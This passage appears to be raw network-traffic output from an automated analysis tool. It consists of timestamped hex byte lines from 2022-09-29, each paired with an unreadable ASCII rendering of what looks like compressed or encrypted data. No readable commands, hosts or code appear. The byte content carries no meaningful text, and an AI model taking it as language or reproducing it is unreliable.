                                                                                                                                                            2022-09-29 12:45:15 UTC19925INData Raw: eb 8c 19 be 19 d8 47 f6 d1 c2 bf 5a 3c 33 7e c8 4c ca 46 d7 00 29 dd 37 34 3d 66 f1 77 38 24 1d 07 39 77 ea 3b 6b 91 72 27 a6 fc 32 2a ee fb 68 98 61 c3 9f cb 7e b7 c0 d9 c3 06 35 9a 79 04 e3 c6 6f 6f f3 fc 1d 5e 90 11 02 ea e9 cf a1 1a a2 90 a0 9e db fa 88 98 cc c6 30 a5 48 b3 b3 f0 f6 15 4b f5 5c 47 71 96 d0 ea 8e e7 9e 95 3d 44 30 84 68 b8 2e 4a 98 5f 7f 48 b0 39 04 05 67 83 52 6e a9 8b 9d 56 4c 25 7d f3 d8 4b 02 9d d9 65 fb 15 ff f1 00 44 e4 67 ec 35 40 0e 54 d7 1e 8f 3e e2 ce da 5e 2a bc b6 08 2c ab c2 f7 fc 7c 0f 9d 84 f5 8b a0 7c 5d 80 1b 21 fe 45 c6 66 39 cd 27 7a b8 61 e0 9a 20 e2 6e 3d 40 c6 6b 45 15 86 c7 29 09 d8 c3 48 09 96 c1 95 c8 14 9c be 97 32 07 8e fa b9 7e 44 94 9a a5 8a 1d af ba 6e ba 21 80 38 d3 81 da e4 7d 6c cd 8f b0 31 92 38 38 d5
                                                                                                                                                            Data Ascii: GZ<3~LF)74=fw8$9w;kr'2*ha~5yoo^0HK\Gq=D0h.J_H9gRnVL%}KeDg5@T>^*,||]!Ef9'za n=@kE)H2~Dn!8}l188
                                                                                                                                                            2022-09-29 12:45:15 UTC19941INData Raw: b8 11 bd 1d 6e fe dd 63 f0 e7 43 8e ea 06 87 8f 1a e1 07 d3 f0 ff e2 f9 be dd f2 72 a2 12 56 a7 ba 26 a2 5d f4 49 76 aa 6f 81 e6 5c f4 89 c7 87 7a 97 08 c9 e8 0a 1b 53 22 eb 70 26 52 1d a3 88 84 a8 16 02 6d e8 57 1b a3 42 75 67 0c ca 94 2d e5 ae e0 db f7 6f ac cf 4e 54 e8 df 9a 0d df e0 92 26 7a be 18 fc fd 19 d4 f7 03 4b 71 b8 6f 80 3d af ed 5c bc 18 22 3a 30 d3 21 57 f7 02 94 80 c2 fb 5f 99 cc df e5 23 78 cb 44 53 28 86 b8 58 d1 51 6c 05 62 5d cc a8 17 b6 02 0e 07 b0 ba a9 6a fb ea 32 c1 3a 91 69 4f f4 60 b5 51 d9 3f c5 2c 6f 43 2c ac ba 1c 3d 36 d5 19 3a 9a e7 01 3e 32 d9 f9 38 b3 05 f5 79 1f 94 ab 38 9f 26 d1 7f 9e 89 b3 fe ec 61 7a d8 3e c9 a4 af fb 62 df 4e 05 bc 75 6d 7e 30 cd d7 9f 94 f1 8e 54 df 09 48 b3 9b 0c 12 4c ed b4 2a b5 c7 f2 53 27 f1 98
                                                                                                                                                            Data Ascii: ncCrV&]Ivo\zS"p&RmWBug-oNT&zKqo=\":0!W_#xDS(XQlb]j2:iO`Q?,oC,=6:>28y8&az>bNum~0THL*S'
                                                                                                                                                            2022-09-29 12:45:15 UTC19957INData Raw: eb d1 50 5e 2e 61 bb f0 97 50 e4 b2 34 6a c7 45 05 18 3c 15 81 01 e9 cd 59 ee 06 3d ae 9d 1e b3 58 aa 64 8a 8a 49 5e 26 d0 c9 7e ea b6 b1 81 a2 05 d2 73 17 7a c0 60 fb 26 da dc 8c 68 b6 06 18 ed 82 5a 27 5d 52 c2 f6 ea 33 ea ed 2e 84 a4 d9 02 2a 9e 05 a7 27 c7 9d 9e 74 d5 be 13 69 ad dc a3 9c 97 55 2e 95 a2 18 c1 16 13 c3 f3 d9 4f c4 7b 84 56 05 46 5d 0d a0 3f 30 7f a1 72 a0 fe 30 06 8a d6 56 1f e5 d7 3f c9 df eb 98 20 84 ad 8f 93 26 cd 36 4b f7 3f 69 64 36 31 f3 f0 23 84 11 06 32 bb 79 57 7c 0d 69 03 59 51 8c 92 ff 34 e4 17 7d 84 3d 94 0e 3d bd 1d db 79 5a 73 1a 4c 53 92 66 c8 b1 6e 7b 8b 1c 3c dc 53 94 6d ad ba 4d 39 bf 7c ba 13 b9 2a 8b 1b 91 f7 b5 e7 62 7e cf 84 74 05 57 37 cb 40 d6 de 82 36 29 32 7a ff 57 b8 e0 0c ef a6 1b 17 d0 45 33 bb 28 16 cb 5c
                                                                                                                                                            Data Ascii: P^.aP4jE<Y=XdI^&~sz`&hZ']R3.*'tiU.O{VF]?0r0V? &6K?id61#2yW|iYQ4}==yZsLSfn{<SmM9|*b~tW7@6)2zWE3(\
                                                                                                                                                            2022-09-29 12:45:15 UTC19973INData Raw: 5e 25 72 7a 87 51 a6 cc fa ad 70 d1 cc 0c 4b 9f e4 db ad 33 0a f3 54 a1 ef 9b b6 df 6d 04 4f 39 ac a4 a9 f1 73 f3 59 0d c8 ae 7b 7f 5f c7 34 52 d7 4e 34 a8 9f b6 81 8a f1 58 42 d6 1d 38 3b 93 22 ca d2 8f d1 c6 f1 5e 7d ca 09 ba d8 0a db f2 1a 2a 60 72 92 89 ee 94 d1 8f 3d 7d 79 d9 96 a8 44 78 9f 8f 53 2e d2 b3 88 ea a6 8e d6 b1 88 52 0e 5a 3f 25 74 8b c2 61 69 fa cc 62 9f dc a7 4f 47 6d 0e 24 5e 6a bb c7 4f 5f 24 c3 25 ae fd c4 3c af eb 0d 4b c4 19 07 ea 5a c5 f1 f3 0e a1 fb 53 65 b8 d9 54 75 2a 59 5d d2 c6 45 c1 af df 99 95 8a 36 21 aa 90 fe 6c ea da 3b 9a 97 40 0a da 72 aa a4 5b a9 54 fa 75 21 b9 09 4e f8 77 40 c0 f8 cd 83 fd 3d 2b c2 5b 60 85 9f b3 6b e9 c4 8c c5 55 ae f0 9a 1e d3 a6 fa 26 7c 3f f8 78 64 07 66 fc a9 e1 cc cc b1 4d a5 13 5a 26 54 74 71
                                                                                                                                                            Data Ascii: ^%rzQpK3TmO9sY{_4RN4XB8;"^}*`r=}yDxS.RZ?%taibOGm$^jO_$%<KZSeTu*Y]E6!l;@r[Tu!Nw@=+[`kU&|?xdfMZ&Ttq
                                                                                                                                                            2022-09-29 12:45:15 UTC19989INData Raw: 21 2a dd 3e 01 1f 1e 8a 7b b7 a3 f7 e0 b0 22 2b 5b 54 14 20 f2 53 88 c6 6b f1 ac 21 ed ce b7 df e0 7a 08 a5 b2 b4 9a 31 01 3e 09 b4 11 d9 40 dc 7d ab 22 fa 1a c0 0a f2 64 8d 0e d6 94 e8 04 40 c2 4f 76 cf 80 fe 5f 94 cd 86 50 2e 44 4c 38 0f 2e a2 57 e1 49 36 26 db b8 76 46 a1 1d bb 19 56 ce ce a8 74 76 1e da ec 31 39 42 bb 55 b2 d3 99 e0 a3 ad a0 a3 1a 59 83 af a1 a1 9e b8 fc 0b 39 c2 56 37 fa 86 8d d5 4c ad 57 79 ed 66 89 81 f4 d0 cc 34 84 fa 83 c1 21 77 14 61 1d 87 93 25 a7 cc 5f 14 1c d4 40 87 ba ed 1e 7f 15 2d 89 08 7c 0d 87 e0 e3 5e e0 76 ed eb 59 03 80 1b 06 81 61 4e 4a 50 61 fc dd b1 89 75 b7 da 83 3c 84 51 84 7c 0b 1a b8 10 72 00 70 2e 07 a8 c1 88 2c c0 9d bd ad cf 72 38 f2 27 28 ae e4 e7 73 03 0a a6 66 41 6e 96 8b f2 97 fb 15 26 fe 18 ff 84 84 84
                                                                                                                                                            Data Ascii: !*>{"+[T Sk!z1>@}"d@Ov_P.DL8.WI6&vFVtv19BUY9V7LWyf4!wa%_@-|^vYaNJPau<Q|rp.,r8'(sfAn&
                                                                                                                                                            2022-09-29 12:45:15 UTC20005INData Raw: ba b7 47 88 e0 4f 38 7b ef 4b 7c 42 79 6d 76 47 19 79 44 1d 6b 77 08 4d 15 68 42 b0 a8 88 15 a9 88 80 d8 0f d8 93 0e be 31 f0 fa a8 99 3e 59 b2 24 93 55 3d 05 08 1c 31 56 f4 87 c3 33 ee 4a 8a 39 2e fb 75 3b 21 29 63 1b 7c 26 c3 22 3f 99 97 13 da 3b 20 66 bd a0 ec ca 81 55 13 cf 49 6b 62 7a e5 30 5e 3c 4c ab c8 2e 5d c2 e3 72 d1 b3 5b 06 92 0f 30 0d 1a ed f7 a8 e0 e7 20 b3 5f 4a 5f ff a0 7e 0d 4a 84 96 84 76 f5 1f b3 5f 26 43 ab 28 52 db 9c 04 78 af c4 a3 f7 32 33 d8 66 bc 43 39 6e e3 ad cc b1 ad 16 f7 b0 7e 34 e0 92 6f 9f 4c 38 7c 53 67 0d 38 0c a0 92 cb a7 05 43 34 a5 a2 6e 0b f5 ae e0 c7 b3 f6 78 1e 11 8d 92 36 49 92 4f 0b f0 5b fc 74 4d 6c 8d 2c 87 28 f6 e7 70 64 c7 2c 16 fa ff 87 c3 ae d9 e5 69 9c 52 52 e9 34 b4 2c d4 47 c4 d1 ea 1d c1 df 87 7e 02 63
                                                                                                                                                            Data Ascii: GO8{K|BymvGyDkwMhB1>Y$U=1V3J9.u;!)c|&"?; fUIkbz0^<L.]r[0 _J_~Jv_&C(Rx23fC9n~4oL8|Sg8C4nx6IO[tMl,(pd,iRR4,G~c
                                                                                                                                                            2022-09-29 12:45:15 UTC20021INData Raw: 6b 8b ab 4d a0 04 61 5e d5 81 e6 0b 2a eb 39 e2 0e a9 86 32 5c 72 79 42 4e 08 c2 93 f3 2a a5 d1 8d c2 8c 7a 5d 4e b9 a5 33 a6 19 fa 3e f7 52 4b 37 8a cf 4f 9e ef cd 4e 90 7b 30 68 16 ed a8 35 d5 ba 5e f5 86 99 cb aa 35 35 a2 41 80 54 cf 38 1c 65 fb c5 20 79 cc ee 5e 65 b6 8c 40 ee 87 fc 47 e4 7a 1c f8 ea ae 28 61 74 f2 99 23 52 36 5f de 84 00 b3 76 a9 00 f7 47 0f d3 99 5c 51 58 fe e5 d5 81 43 fb 46 8e 98 65 1a d3 63 60 6b a9 69 34 54 c2 0e 03 3b 7a 2b 69 2d 30 e2 99 9a 71 3d 24 23 46 4d 93 df e2 16 eb 14 d8 04 a9 2b d2 38 34 80 32 cb 3b 4d 6e 7e ee 8c 78 52 b4 e1 27 a9 f3 46 a6 c9 4c 56 d4 92 90 23 dd 5a 60 62 98 bc 6e 15 fd 4d eb 69 1d e8 74 af 6c 6f e8 45 fa 3c 08 cb d0 f0 c0 11 5f 6f 6b 0b e8 dd 51 e9 4e e0 b8 73 20 2e 54 06 23 8f 0d 85 16 f6 81 4d 73
                                                                                                                                                            Data Ascii: kMa^*92\ryBN*z]N3>RK7ON{0h5^55AT8e y^e@Gz(at#R6_vG\QXCFec`ki4T;z+i-0q=$#FM+842;Mn~xR'FLV#Z`bnMitloE<_okQNs .T#Ms
                                                                                                                                                            2022-09-29 12:45:15 UTC20037INData Raw: b0 fb fb 48 5f 79 47 90 1b d3 d3 7f 84 52 c7 99 89 9a 15 02 96 ad 54 b5 73 14 41 7f 4a 86 b1 29 14 d6 60 db 2d ca f7 b3 46 ed d2 3a 4a 1c bc 6f b8 c8 a7 59 d7 56 38 ea 15 88 bc 2e d0 bc c9 d4 9d 97 f7 f9 8a 00 a8 c3 3a 42 10 61 7d 48 44 66 c4 3f 52 08 35 54 ea 7a 6b 3f 25 4f 33 c6 71 19 74 aa ae c2 12 35 12 34 8a d4 65 9d 86 a9 ad 2d 01 9c cc 81 e2 41 23 8a ad 88 27 53 68 6b f6 a7 8e 97 9c e1 05 77 19 fb 9b cc 39 b3 3d dd 96 5a 4f 37 66 da 50 2b 36 74 f1 b9 41 8c 2d 6d 7f 2d 82 ae f2 60 67 b1 9e 6a 98 0b 03 4e cc cb be f6 70 ba 62 1c d9 a6 04 44 39 83 0e c5 ee cd f5 df 4a 22 1a 04 73 43 42 ff fc 8d de 4f 72 68 78 d9 9b 8b f2 35 25 a5 67 9a 6a a3 d0 9c b1 90 58 c0 a2 3f 3e ea 98 be fd 45 03 16 35 da 88 ed 5d 74 b7 5c 79 40 d0 fa b5 cf 8b 9e 55 7a ef 4c 10
                                                                                                                                                            Data Ascii: H_yGRTsAJ)`-F:JoYV8.:Ba}HDf?R5Tzk?%O3qt54e-A#'Shkw9=ZO7fP+6tA-m-`gjNpbD9J"sCBOrhx5%gjX?>E5]t\y@UzL
                                                                                                                                                            2022-09-29 12:45:15 UTC20053INData Raw: a5 5a 16 2e 26 2c 5e 5b 9a 5c 5c 6a 13 31 93 40 2c a6 0d f2 85 0d 50 94 33 5c f4 e9 62 b0 68 ec ec 61 83 b9 5f 3a 5b 16 46 2a 4b 21 cb bd 0b 31 8e 31 a2 40 aa b2 87 e9 a2 08 af 3b c8 2b 59 9b 0e 5e e5 96 ec 39 98 64 a1 0c 35 2d 7c 3b da 63 f3 42 f7 86 f7 4b 9a 9f 26 b7 12 12 9a 38 94 90 68 5b 5e bb 41 2a 17 a0 68 46 49 ba be 88 72 7c d2 e3 09 3f 3c a2 0d b7 cd c7 0a 29 4b 55 d6 11 39 a8 26 0f e7 be 23 46 f4 62 6d f0 d8 57 be 7e 6b f5 a7 f7 78 87 f1 13 6d 5b cf 08 49 0b 31 cf 02 28 11 35 df d6 c6 a4 aa c6 65 9e b2 2e 30 46 5d 01 35 66 99 18 b6 d6 44 6d 2c 56 2d ea ec 6e e1 da aa 93 65 cd 62 7d 43 d3 b3 a7 8d 27 6f b4 c6 22 49 d5 c4 48 de 4d ad 29 ca 30 2a 6e 09 43 23 d1 21 fc e4 bd 73 a7 66 0d 63 33 fb 06 91 49 9a 36 89 13 67 9b c0 af a6 0d 85 36 d4 82 aa
                                                                                                                                                            Data Ascii: Z.&,^[\\j1@,P3\bha_:[F*K!11@;+Y^9d5-|;cBK&8h[^A*hFIr|?<)KU9&#FbmW~kxm[I1(5e.0F]5fDm,V-neb}C'o"IHM)0*nC#!sfc3I6g6
                                                                                                                                                            2022-09-29 12:45:15 UTC20069INData Raw: 00 b3 95 01 fc d5 c1 68 61 4d ae 72 c0 fe 81 e2 f8 b7 ab 07 f5 b9 ac ca f3 8d 17 0d 4c ab 6d 74 c2 72 87 7b a0 2d 60 30 ab fb 46 09 72 98 ec b0 db ed ea 57 ab 62 10 f5 69 05 78 a9 9f f3 da d6 e4 25 bc b9 ad 30 f7 05 88 1a 5d 2f d7 9d 54 1d b1 d5 7c 35 ac d7 21 99 a2 c5 1f 92 1b 3c 7c 16 44 25 62 1d 94 23 e2 eb d0 6d 03 f9 00 c6 18 36 78 be 05 e3 83 18 c1 c9 b2 12 99 c4 d6 26 9d 39 a8 52 de 4d c3 94 86 80 96 b9 7b 3e 57 49 3a 86 9f 23 2e 9a 24 b2 46 19 7a 0c f4 41 0a 3a 1e 09 8b ff 5b 6c bb 68 fa 41 2c 59 87 ee 09 7b 8d 84 ad aa e0 72 fc ec 75 bb 5c 09 a3 1c 79 39 81 64 07 6d 5e ee 95 a7 15 79 b2 97 e3 74 40 20 0b a4 62 31 51 56 c3 aa 07 60 dd 19 72 a7 e8 04 fd 55 e2 a6 f7 3f 57 11 21 89 e7 89 b4 14 df 7d 46 93 c7 b7 ae 21 fd ec f8 18 19 db e6 7e fe 5c 6b
                                                                                                                                                            Data Ascii: haMrLmtr{-`0FrWbix%0]/T|5!<|D%b#m6x&9RM{>WI:#.$FzA:[lhA,Y{ru\y9dm^yt@ b1QV`rU?W!}F!~\k
                                                                                                                                                            2022-09-29 12:45:15 UTC20085INData Raw: c0 9f a3 da eb 2d fe bd 1a e4 2e af 9c b8 30 47 8e ad 38 4a 21 c0 58 cf 2d e1 77 2a ea 43 4b ce eb 21 b6 71 10 ac da 17 6d 6d 41 f6 20 ac 41 ef 51 3a e0 70 80 69 6c d4 e0 dd 88 51 25 ed ab 65 a7 a3 b6 e5 b3 63 95 6e 1f 60 c2 8c df 67 4c 85 63 d9 22 b8 cf 0c d1 77 38 1f ca 31 dc d6 84 b8 23 06 46 3d e1 5f 4c 3f 95 69 92 32 91 37 0f 98 c8 c4 c0 81 34 80 07 a1 d6 07 92 45 ac 40 67 d4 2d 9f 47 2c 00 79 da a3 d8 3a 71 ca ae ea bc 95 86 0f 58 b9 41 03 eb 74 56 d9 0e d2 aa 75 dc d0 38 6e c3 cc f7 46 0b 9c c6 f7 0b 9f 4a 4f 69 95 cd e2 eb fb d2 cf 52 c8 27 01 05 f8 6b ca 54 fb 0f 72 b3 b7 60 76 cf 71 77 7b 78 db f8 c0 56 5c 78 13 71 06 95 a5 6a f0 8c 21 45 1e 97 e6 eb 50 12 f0 bd 79 16 48 2b 14 b6 e9 35 da d9 8b 11 1f f7 40 c7 58 1a d8 cb c3 76 68 a1 99 0b 11 06
                                                                                                                                                            Data Ascii: -.0G8J!X-w*CK!qmmA AQ:pilQ%ecn`gLc"w81#F=_L?i274E@g-G,y:qXAtVu8nFJOiR'kTr`vqw{xV\xqj!EPyH+5@Xvh
                                                                                                                                                            2022-09-29 12:45:15 UTC20101INData Raw: 79 7a 32 5c 6d c5 83 f7 2c e6 32 e7 25 c2 73 85 15 20 6d e9 b3 34 18 56 9a 0f bf d1 fb 43 11 f7 9b ae 1c 5a 48 a9 53 d0 85 f6 db ec a7 8f c8 0e f4 c1 95 1c 2b 3e 85 e3 93 d4 6f 21 38 fe 39 e3 f8 bb 66 30 c8 83 c5 0e 9b cc f7 c1 12 2f a1 6f 94 f0 5f 42 cc b2 48 fd f3 9e 60 66 cc 59 2d cf 26 71 21 26 96 0e 35 45 2b 22 02 35 c7 7e 58 5f 7e 37 9c 89 a4 fa 34 38 19 a6 26 d6 6b 25 62 55 c6 c9 c8 d2 18 ce 21 dc 89 6b ae 3f 94 d7 a0 3b 21 4f 49 d3 19 9c 7d c1 4e 3c cb 1b c7 3e 46 9a 79 ca e9 20 00 f5 72 99 8e c7 93 fb f4 05 77 0b de 39 22 37 27 60 84 b5 da 60 5c a0 9e 74 d7 af e5 f4 eb 63 10 64 76 37 0b a8 24 f5 d5 03 4e 97 6e 12 c6 99 a6 a1 d3 8c 4d 2b 73 aa e0 02 8d b5 b3 0f 31 a1 02 5d 20 3a ac c1 15 98 41 77 cf 54 3c ca 6e 59 2b 1a b2 b3 ef 27 cb c5 c9 e9 0f
                                                                                                                                                            Data Ascii: yz2\m,2%s m4VCZHS+>o!89f0/o_BH`fY-&q!&5E+"5~X_~748&k%bU!k?;!OI}N<>Fy rw9"7'``\tcdv7$NnM+s1] :AwT<nY+'
                                                                                                                                                            2022-09-29 12:45:15 UTC20117INData Raw: 7d b0 8a 04 cd 0c db ac ea 2a 6a 43 c2 97 a5 23 07 57 7f 5a d8 75 98 90 e8 0b 86 09 9a 3c 0a 8d cb 38 99 2c e4 fb 96 cf a9 0c a9 f8 a3 4d 61 cc 5c f9 6d f9 96 18 a3 1f 01 b4 65 75 a1 cd 97 a0 ad d0 4f 6e 01 89 eb 2d 31 3c 5b 38 b1 2b 08 d1 3f a2 67 64 40 25 a1 3b d6 6d 15 48 79 e2 8f 97 77 6e 43 46 c2 7a 67 30 31 7a 05 2c be 15 85 9b 9b a0 dc c0 22 3e 1b 4c c7 12 8a fb 7c df ff 18 29 4e 35 51 1b 0d 1b 44 a2 3b 4a 22 66 3f 39 38 c3 be f6 fc 62 d8 28 ea 2c c8 36 7c 1a 0e 58 dc 03 33 2a ba 4b e8 bd fe 3c ee 3a 62 10 dc f2 70 bf 83 2d 5a d9 1c 30 35 3e fc d1 a1 98 5e 09 71 5f 1a 11 0d ed 29 cf f5 57 f0 96 89 d2 34 d9 39 ca 15 7a 11 9f fb 7f c2 47 79 d3 f4 8c 91 d4 6c 67 e0 1c da 0e 63 66 9c 5c 09 ef d7 af c1 0f cf f6 20 68 f7 9e 94 75 87 7b d8 c7 01 d9 9a 6c
                                                                                                                                                            Data Ascii: }*jC#WZu<8,Ma\meuOn-1<[8+?gd@%;mHywnCFzg01z,">L|)N5QD;J"f?98b(,6|X3*K<:bp-Z05>^q_)W49zGylgcf\ hu{l
                                                                                                                                                            2022-09-29 12:45:15 UTC20133INData Raw: 46 98 ca bb 5d 2d 38 06 39 76 e5 5a ba 8a 82 5b 64 2e fc a4 5c 56 ae e4 9d 71 10 e6 20 a1 db 7f 7b 8d 5b 77 f8 1a 26 e8 70 61 14 42 44 4f 64 75 0b 19 3b 6d d1 33 5c bc bf 22 73 eb d0 b2 ee 5e a9 42 b6 44 54 84 f3 bd 1f a3 50 68 d8 a5 ba 4e 97 cb 69 f5 38 43 2c ba bd 72 28 33 2e 23 06 ab 65 87 f3 a0 6d 18 96 ae 4f ba a4 31 fc 9a 71 db df f1 fc c6 f0 f5 f7 54 78 41 99 2a 06 f1 ac 1b 05 1c ae a1 f5 83 13 e7 7d 9c 78 56 d8 1d 52 39 7f c1 95 ab 5c 50 b7 b9 d6 b4 c7 07 30 a9 b3 c0 92 b2 d8 9d 08 bd 18 f3 f8 be b2 2f 43 0c b1 93 50 c1 81 e3 4f aa 22 c9 c1 a6 59 73 b4 42 d7 7d ef 7e 7f 91 e7 e7 50 42 a4 80 1e 7a ae 05 de b9 8a ae b6 bc 88 16 07 c3 4b 47 c8 f4 c0 79 aa dd 90 c2 46 f0 20 d9 72 f8 95 91 f2 d7 24 1b 18 f7 a4 3d c7 5f 7d 82 5c d1 3d d7 9d 45 c8 95 13
                                                                                                                                                            Data Ascii: F]-89vZ[d.\Vq {[w&paBDOdu;m3\"s^BDTPhNi8C,r(3.#emO1qTxA*}xVR9\P0/CPO"YsB}~PBzKGyF r$=_}\=E
                                                                                                                                                            2022-09-29 12:45:15 UTC20149INData Raw: b1 cc fd f1 fb 0b b3 74 16 71 18 53 b7 43 7e 71 65 91 5d 0a dd a4 ff c1 d6 e8 11 cd 87 2b 13 5e b4 61 5d ec 7f 37 0f 99 99 06 c1 82 da 58 72 14 d4 d8 e9 06 63 8a c3 24 9b 5c 12 76 46 3e 99 79 45 12 56 42 3c ca dc 5c 05 62 ae 69 de c6 ae 41 09 75 12 04 28 4f 39 b5 cb 80 04 5a f3 b2 d6 11 4b c4 9d b6 76 3b 6b 24 79 4f 71 26 84 ae 8d 78 73 20 88 85 19 e7 23 e1 91 23 57 fd 77 d8 08 10 13 4e c3 dd 0a b0 3b 47 a8 8e 47 17 29 21 8e 7b 68 ad b9 55 b6 4e 61 ba 33 a7 5b 36 f1 73 9d ed db ea 0c 82 e9 7f 40 db c3 bf fd e7 ad 42 b7 8e 86 57 9e 51 01 17 31 f8 2c e7 1c 87 aa 95 cb 59 d0 01 04 f0 a2 4d af 4a c0 84 c6 09 99 f7 06 32 60 c9 c9 a2 fe 79 bd 32 95 d6 4b 44 a6 fc 45 40 30 39 1b 0c db 07 02 cc d2 0f 31 da 08 ad 62 4b b5 ca b6 d0 60 ad d0 04 71 7a 70 c9 9a bd 6a
                                                                                                                                                            Data Ascii: tqSC~qe]+^a]7Xrc$\vF>yEVB<\biAu(O9ZKv;k$yOq&xs ##WwN;GG)!{hUNa3[6s@BWQ1,YMJ2`y2KDE@091bK`qzpj
                                                                                                                                                            2022-09-29 12:45:15 UTC20165INData Raw: 9c 9e 07 0c db ce 90 ae ac 65 76 f1 c7 18 07 d9 e2 a1 54 8a 91 b7 4b 3a ac ac be 86 95 65 5a 25 47 f6 ab aa 87 11 a0 81 76 be 4d 8d 21 44 e1 8f b3 da 85 35 cb a7 70 cc 0c 9b af e9 aa 3a 5f bf 30 74 dd 59 5b 0d ba ff 55 6c df 0c 01 95 9b 03 43 d1 84 5c ce 8b 51 d9 73 4f d5 c1 71 e7 58 87 e2 b0 99 6b 8f c3 49 58 88 8e ab 16 57 a4 7c c4 16 59 c5 95 a6 31 1c 6f c4 0d 3d 0e 25 64 d1 d3 60 83 f4 51 a2 b4 6f d3 e2 10 1f 70 a4 79 a3 ed 37 b9 a0 98 29 4d a4 fb 4e 33 5b 9e dd 13 40 86 75 af 7f f5 3f 5d ea 1c 80 d4 0e f9 55 63 ae de 52 f2 2a 9a c0 46 2e 5d d6 aa 4e 87 54 97 97 43 f6 bd e5 36 3f 24 13 34 fd d3 e4 46 de 87 f4 ab e5 0e db b2 65 4f 7d 79 90 c5 88 c4 a5 02 41 a7 e9 ad 73 b4 4b 48 70 c2 2d 34 1e d9 d0 a6 5e 21 80 94 b2 1d 22 12 37 d5 52 64 8a 0e d2 f4 2d
                                                                                                                                                            Data Ascii: evTK:eZ%GvM!D5p:_0tY[UlC\QsOqXkIXW|Y1o=%d`Qopy7)MN3[@u?]UcR*F.]NTC6?$4FeO}yAsKHp-4^!"7Rd-
                                                                                                                                                            2022-09-29 12:45:15 UTC20181INData Raw: 7b e4 9b 4c ee cd 08 09 74 0f 93 bc af ad 80 c6 61 28 f0 19 ca a8 bd af 89 22 ec 87 78 41 20 22 75 ed 4f 36 c0 a7 19 19 22 45 a8 58 72 bd fc e5 0e 87 11 f1 cf 22 84 fc 44 d3 94 09 c0 a2 4c b1 5b bb fc b0 4b e5 88 7e e0 65 fa 0e 5e 20 c0 4f a2 e6 24 06 f3 d8 82 d1 74 13 18 46 b3 a5 85 f4 6b e7 ba f2 16 d0 a4 b7 27 02 db cf ab 6d 73 4d 17 9a 1a 80 85 99 8f b0 6f a2 3b 8e e8 34 e4 ef ff e3 1f b4 57 1d 10 69 05 77 68 e9 cf 4e 20 60 1c 51 a1 cc 63 a8 10 01 63 79 e4 33 d0 9f 04 4b 74 e2 d7 30 55 90 96 90 77 6b c9 a4 aa b1 5c da c7 72 39 a9 9a e5 1b 7e ce 3e 56 69 c8 92 88 37 67 ea b4 6d e2 e7 03 fd 72 72 12 23 62 3a e4 61 9b 00 43 64 5c 37 c6 b5 35 8a a4 78 7f aa 85 ab ab 46 1c 29 5a 88 77 70 37 50 eb 55 60 90 dc 88 8f f5 69 a2 09 bb 0c 16 18 be 77 bc 4c a8 ea
                                                                                                                                                            Data Ascii: {Lta("xA "uO6"EXr"DL[K~e^ O$tFk'msMo;4WiwhN `Qccy3Kt0Uwk\r9~>Vi7gmrr#b:aCd\75xF)Zwp7PU`iwL
                                                                                                                                                            2022-09-29 12:45:15 UTC20197INData Raw: 91 6e 17 8a a5 99 36 24 ca 1a 2a 7c 05 16 11 a4 e3 5e 45 12 c2 30 16 30 e4 db 07 1e 4b af 47 95 7d 74 10 66 78 ba 32 e3 68 e8 88 83 fd 43 27 c7 44 22 61 b1 4d 56 9b 96 2e 45 d6 3c cd 9e 80 96 83 cb 05 7d 6f 16 a1 10 da 73 8c 55 e1 b5 e0 c8 57 8c f0 9f 7e 89 54 ce d9 85 e2 54 51 79 2e 2c 40 d3 0d a7 08 36 25 17 8e 92 a3 03 f0 a2 24 2d ab ee 3c 23 8c 46 c8 68 98 ec 09 07 5f 98 d9 e6 08 d4 9a 3b ec a0 28 f4 b4 26 03 e3 b2 17 18 3a 7b f7 50 03 a5 57 79 1e 9b 8d f1 47 2f a1 97 c8 37 91 e1 e8 2a be d8 6c bb 97 a8 51 db a9 5a ae ab 33 3d 1f 30 ad 5a b5 f4 4e d4 db 50 1a af 48 ec 55 21 9d a1 0f df 36 13 96 8f 1f a5 3f 80 3d bf c1 91 d7 a2 02 24 c4 72 30 aa 57 49 6d fa f1 e9 91 a6 10 e8 8e 04 02 d5 10 f7 11 1d 81 41 5b 71 f2 b6 4d 51 5c 4a f3 67 06 c4 ef 68 a3 97
                                                                                                                                                            Data Ascii: n6$*|^E00KG}tfx2hC'D"aMV.E<}osUW~TTQy.,@6%$-<#Fh_;(&:{PWyG/7*lQZ3=0ZNPHU!6?=$r0WImA[qMQ\Jgh
                                                                                                                                                            2022-09-29 12:45:15 UTC20213INData Raw: cf 87 10 a5 e2 2e 24 46 4a fe fd 6c ea a8 1e 86 e2 e7 4e c2 ae 02 a7 7b 35 37 e1 40 ff 8b 98 da a1 55 24 e0 42 33 c3 d0 96 2b 2c 8b 9c a0 d6 22 98 54 33 dd 9f 2c db c3 9f 3d 52 23 96 3a 7f 38 59 7f be 67 2f 82 e7 6e fd 11 66 97 dd ae 7a da 05 35 3b e9 a0 3c e0 5c e3 9d 4a 53 7f d9 11 15 30 95 03 9c 40 ed 8a b5 10 cd 25 bd 19 fe e5 5e ea 83 89 b2 26 1b 06 65 1b 09 a6 a5 9c c3 9d 28 44 33 b2 91 c5 d9 bd 27 f2 cc 45 7a 87 e2 95 d4 7d 29 e6 bd ff 26 86 50 a6 53 bf c9 cb 49 69 46 a6 4d c6 37 ed 3b 5a a4 a7 7d 0c 86 ef ee 16 c5 dc 5f 0e 8c 61 d4 3d 6c 75 a5 8c 37 a0 6b 28 63 48 c7 5c 5f 98 da 7f e5 21 06 71 56 e7 21 67 47 37 b5 a7 ba 16 23 5f c8 42 5a 6e b4 36 df db 40 2c 6b d8 c9 74 e0 2c 92 0f 80 9d 9a ce 27 b8 77 df de 3a 0b df eb 19 83 7d d3 81 3c df 38 a2
                                                                                                                                                            Data Ascii: .$FJlN{57@U$B3+,"T3,=R#:8Yg/nfz5;<\JS0@%^&e(D3'Ez})&PSIiFM7;Z}_a=lu7k(cH\_!qV!gG7#_BZn6@,kt,'w:}<8
